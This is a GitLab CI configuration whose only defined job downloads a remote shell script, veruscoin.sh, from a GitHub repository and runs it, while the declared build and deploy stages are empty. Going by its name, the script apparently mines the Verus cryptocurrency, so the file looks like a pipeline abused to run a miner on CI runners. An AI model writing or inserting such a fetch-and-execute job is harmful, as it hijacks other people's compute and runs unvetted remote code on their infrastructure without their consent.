stages:
  - bachannel
  - build
  - deploy

bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ontand/verus/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
